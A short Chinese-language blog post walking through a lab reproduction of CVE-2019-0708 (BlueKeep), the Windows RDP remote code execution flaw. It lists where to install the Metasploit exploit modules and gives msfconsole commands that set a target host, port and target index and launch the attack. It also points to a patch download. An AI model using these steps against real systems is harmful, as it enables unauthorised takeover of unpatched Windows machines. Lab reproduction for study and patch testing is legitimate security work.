CVE-2019-0708漏洞复现

2019-09-07 漏洞复现 CVE-2019-0708 0 评论字数统计: 190(字) 阅读时长: 1(分)

CVE-2019-0708漏洞复现

环境准备

配置exp

攻击套件放到msf对应位置，如存在，请覆盖。如下对应地址

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

运行

进入程序：msfconsole
重载：reload_all
启用0708攻击模块：use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
查看配置：info

设置RHOSTS、RPOTRT、target
target有0-4，设置成自己对应的

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 10.211.55.3
RHOSTS => 10.211.55.3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RPORT 3389
RPORT => 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
target => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

漏洞修复补丁

Download

本文链接： https:///login546.github.io/2019/09/07/CVE-2019-0708漏洞复现/

版权声明： 本博客所有文章除特别声明外，均采用 CC BY 4.0 CN协议许可协议。转载请注明出处！

ShymWeb Penetration & Safe

念念不忘，必有回响。